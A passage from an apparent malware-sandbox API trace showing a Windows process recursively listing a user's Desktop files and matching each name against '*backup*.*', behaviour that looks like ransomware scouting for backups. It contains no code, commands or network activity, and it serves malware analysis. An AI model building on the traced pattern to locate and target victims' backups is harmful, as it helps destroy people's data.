lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\fmnAnasf2I.mp4", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0110.880] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2e) returned 0x39700d0 [0110.880] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\fmnAnasf2I.mp4", cchWideChar=46, lpMultiByteStr=0x39700d0, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\fmnAnasf2I.mp4", lpUsedDefaultChar=0x0) returned 46 [0110.880] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a0508 [0110.880] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.880] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.880] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.880] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970f00 [0110.880] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x3970f00, cchWideChar=11 | out: lpWideCharStr="*backup*.*") returned 11 [0110.880] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970448 [0110.880] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970f00 | out: hHeap=0x29a0000) returned 1 [0110.880] PathMatchSpecW (pszFile="fmnAnasf2I.mp4", pszSpec="*backup*.*") returned 0 [0110.881] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970448 | out: hHeap=0x29a0000) returned 1 [0110.881] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0508 | out: hHeap=0x29a0000) returned 1 [0110.881] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.881] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.881] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="g3fX8Y8-txe9_Es.m4a" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\g3fX8Y8-txe9_Es.m4a") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\g3fX8Y8-txe9_Es.m4a" [0110.881] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.881] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.881] lstrcatW (in: lpString1="\\", lpString2="g3fX8Y8-txe9_Es.m4a" | out: lpString1="\\g3fX8Y8-txe9_Es.m4a") returned="\\g3fX8Y8-txe9_Es.m4a" [0110.881] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a04a0 [0110.881] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\g3fX8Y8-txe9_Es.m4a", cchWideChar=51, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 51 [0110.881] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x33) returned 0x38ea658 [0110.881] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\g3fX8Y8-txe9_Es.m4a", cchWideChar=51, lpMultiByteStr=0x38ea658, cbMultiByte=51, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\g3fX8Y8-txe9_Es.m4a", lpUsedDefaultChar=0x0) returned 51 [0110.881] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2930 [0110.881] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ea658 | out: hHeap=0x29a0000) returned 1 [0110.881] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.881] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.881] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970ba0 [0110.881] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x3970ba0, cchWideChar=11 | out: lpWideCharStr="*backup*.*") returned 11 [0110.881] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970560 [0110.881] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970ba0 | out: hHeap=0x29a0000) returned 1 [0110.881] PathMatchSpecW (pszFile="g3fX8Y8-txe9_Es.m4a", pszSpec="*backup*.*") returned 0 [0110.881] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970560 | out: hHeap=0x29a0000) returned 1 [0110.881] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2930 | out: hHeap=0x29a0000) returned 1 [0110.881] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.882] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.882] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="Izq83dPIx.mp4" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\Izq83dPIx.mp4") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\Izq83dPIx.mp4" [0110.882] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.882] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.882] lstrcatW (in: lpString1="\\", lpString2="Izq83dPIx.mp4" | out: lpString1="\\Izq83dPIx.mp4") returned="\\Izq83dPIx.mp4" [0110.882] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x60) returned 0x29a04a0 [0110.882] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\Izq83dPIx.mp4", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0110.882] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2d) returned 0x39700d0 [0110.882] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\Izq83dPIx.mp4", cchWideChar=45, lpMultiByteStr=0x39700d0, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\Izq83dPIx.mp4", lpUsedDefaultChar=0x0) returned 45 [0110.882] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a0508 [0110.882] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.882] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.882] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.882] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970d00 [0110.882] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x3970d00, cchWideChar=11 | out: lpWideCharStr="*backup*.*") returned 11 [0110.882] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39704c0 [0110.882] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970d00 | out: hHeap=0x29a0000) returned 1 [0110.882] PathMatchSpecW (pszFile="Izq83dPIx.mp4", pszSpec="*backup*.*") returned 0 [0110.882] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39704c0 | out: hHeap=0x29a0000) returned 1 [0110.882] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0508 | out: hHeap=0x29a0000) returned 1 [0110.882] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.882] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.882] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="k8k6qCAjWYmc.odt" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\k8k6qCAjWYmc.odt") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\k8k6qCAjWYmc.odt" [0110.882] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.882] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.882] lstrcatW (in: lpString1="\\", lpString2="k8k6qCAjWYmc.odt" | out: lpString1="\\k8k6qCAjWYmc.odt") returned="\\k8k6qCAjWYmc.odt" [0110.882] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x60) returned 0x29a04a0 [0110.882] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\k8k6qCAjWYmc.odt", cchWideChar=48, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 48 [0110.882] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x39700d0 [0110.882] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\k8k6qCAjWYmc.odt", cchWideChar=48, lpMultiByteStr=0x39700d0, cbMultiByte=48, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\k8k6qCAjWYmc.odt", lpUsedDefaultChar=0x0) returned 48 [0110.883] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a0508 [0110.883] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.883] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.883] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.883] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970e40 [0110.883] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x3970e40, cchWideChar=11 | out: lpWideCharStr="*backup*.*") returned 11 [0110.883] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970588 [0110.883] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970e40 | out: hHeap=0x29a0000) returned 1 [0110.883] PathMatchSpecW (pszFile="k8k6qCAjWYmc.odt", pszSpec="*backup*.*") returned 0 [0110.883] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970588 | out: hHeap=0x29a0000) returned 1 [0110.883] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0508 | out: hHeap=0x29a0000) returned 1 [0110.883] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.883] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.883] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="KTOu" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" [0110.883] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.883] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.883] lstrcatW (in: lpString1="\\", lpString2="KTOu" | out: lpString1="\\KTOu") returned="\\KTOu" [0110.883] lstrcmpW (lpString1="KTOu", lpString2=".") returned 1 [0110.883] lstrcmpW (lpString1="KTOu", lpString2="..") returned 1 [0110.883] lstrcpyW (in: lpString1=0x19c8c0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" [0110.883] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\*.*" [0110.883] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\*.*", lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf35e67a0, ftCreationTime.dwHighDateTime=0x1d7ab76, ftLastAccessTime.dwLowDateTime=0xca5de70, ftLastAccessTime.dwHighDateTime=0x1d7abbb, ftLastWriteTime.dwLowDateTime=0xca5de70, ftLastWriteTime.dwHighDateTime=0x1d7abbb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7437a0 [0110.883] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" [0110.884] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\" [0110.884] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\", lpString2="." | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\.") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\." [0110.884] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\KTOu" | out: lpString1="\\KTOu") returned="\\KTOu" [0110.884] lstrcatW (in: lpString1="\\KTOu", lpString2="\\" | out: lpString1="\\KTOu\\") returned="\\KTOu\\" [0110.884] lstrcatW (in: lpString1="\\KTOu\\", lpString2="." | out: lpString1="\\KTOu\\.") returned="\\KTOu\\." [0110.884] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0110.885] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" [0110.885] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\" [0110.885] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\", lpString2=".." | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\..") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\.." [0110.885] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\KTOu" | out: lpString1="\\KTOu") returned="\\KTOu" [0110.885] lstrcatW (in: lpString1="\\KTOu", lpString2="\\" | out: lpString1="\\KTOu\\") returned="\\KTOu\\" [0110.885] lstrcatW (in: lpString1="\\KTOu\\", lpString2=".." | out: lpString1="\\KTOu\\..") returned="\\KTOu\\.." [0110.885] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0110.885] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0110.885] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" [0110.885] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\" [0110.885] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\", lpString2="3CEoMqDCJmINqN85E.bmp" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\3CEoMqDCJmINqN85E.bmp") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\3CEoMqDCJmINqN85E.bmp" [0110.885] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\KTOu" | out: lpString1="\\KTOu") returned="\\KTOu" [0110.885] lstrcatW (in: lpString1="\\KTOu", lpString2="\\" | out: lpString1="\\KTOu\\") returned="\\KTOu\\" [0110.885] lstrcatW (in: lpString1="\\KTOu\\", lpString2="3CEoMqDCJmINqN85E.bmp" | out: lpString1="\\KTOu\\3CEoMqDCJmINqN85E.bmp") returned="\\KTOu\\3CEoMqDCJmINqN85E.bmp" [0110.885] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a04a0 [0110.885] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\3CEoMqDCJmINqN85E.bmp", cchWideChar=58, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 58 [0110.885] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3a) returned 0x29a2d68 [0110.885] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\3CEoMqDCJmINqN85E.bmp", cchWideChar=58, lpMultiByteStr=0x29a2d68, cbMultiByte=58, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\3CEoMqDCJmINqN85E.bmp", lpUsedDefaultChar=0x0) returned 58 [0110.885] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2c48 [0110.885] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2d68 | out: hHeap=0x29a0000) returned 1 [0110.885] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.885] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.885] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970c40 [0110.885] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=11, lpWideCharStr=0x3970c40, cchWideChar=11 | out: lpWideCharStr="*backup*.*") returned 11 [0110.885] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970588 [0110.885] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970c40 | out: hHeap=0x29a0000) returned 1 [0110.885] PathMatchSpecW (pszFile="3CEoMqDCJmINqN85E.bmp", pszSpec="*backup*.*") returned 0 [0110.886] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970588 | out: hHeap=0x29a0000) returned 1 [0110.886] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2c48 | out: hHeap=0x29a0000) returned 1 [0110.886] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" [0110.886] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\" [0110.886] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\", lpString2="eUCY-_yVF.swf" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\eUCY-_yVF.swf") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\eUCY-_yVF.swf" [0110.886] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\KTOu" | out: lpString1="\\KTOu") returned="\\KTOu" [0110.886] lstrcatW (in: lpString1="\\KTOu", lpString2="\\" | out: lpString1="\\KTOu\\") returned="\\KTOu\\" [0110.886] lstrcatW (in: lpString1="\\KTOu\\", lpString2="eUCY-_yVF.swf" | out: lpString1="\\KTOu\\eUCY-_yVF.swf") returned="\\KTOu\\eUCY-_yVF.swf" [0110.886] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a04a0 [0110.886] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\eUCY-_yVF.swf", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0110.886] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x32) returned 0x38ea858 [0110.886] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\eUCY-_yVF.swf", cchWideChar=50, lpMultiByteStr=0x38ea858, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\eUCY-_yVF.swf", lpUsedDefaultChar=0x0) returned 50 [0110.886] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2b70 [0110.886] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ea858 | out: hHeap=0x29a0000) returned 1 [0110.886] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.886] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.886] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970e60 [0110.886] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=11, lpWideCharStr=0x3970e60, cchWideChar=11 | out: lpWideCharStr="*backup*.*") returned 11 [0110.886] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970420 [0110.886] PathMatchSpecW (pszFile="eUCY-_yVF.swf", pszSpec="*backup*.*") returned 0 [0110.886] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" [0110.886] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\" [0110.886] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\", lpString2="HLPCM ND3Cl3FgAs3.mp4" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\HLPCM ND3Cl3FgAs3.mp4") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\HLPCM ND3Cl3FgAs3.mp4" [0110.886] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\KTOu" | out: lpString1="\\KTOu") returned="\\KTOu" [0110.886] lstrcatW (in: lpString1="\\KTOu", lpString2="\\" | out: lpString1="\\KTOu\\") returned="\\KTOu\\" [0110.886] lstrcatW (in: lpString1="\\KTOu\\", lpString2="HLPCM ND3Cl3FgAs3.mp4" | out: lpString1="\\KTOu\\HLPCM ND3Cl3FgAs3.mp4") returned="\\KTOu\\HLPCM ND3Cl3FgAs3.mp4" [0110.886] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a04a0 [0110.886] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\HLPCM ND3Cl3FgAs3.mp4", cchWideChar=58, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 58 [0110.887] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3a) returned 0x29a28e8 [0110.887] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\HLPCM ND3Cl3FgAs3.mp4", cchWideChar=58, lpMultiByteStr=0x29a28e8, cbMultiByte=58, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 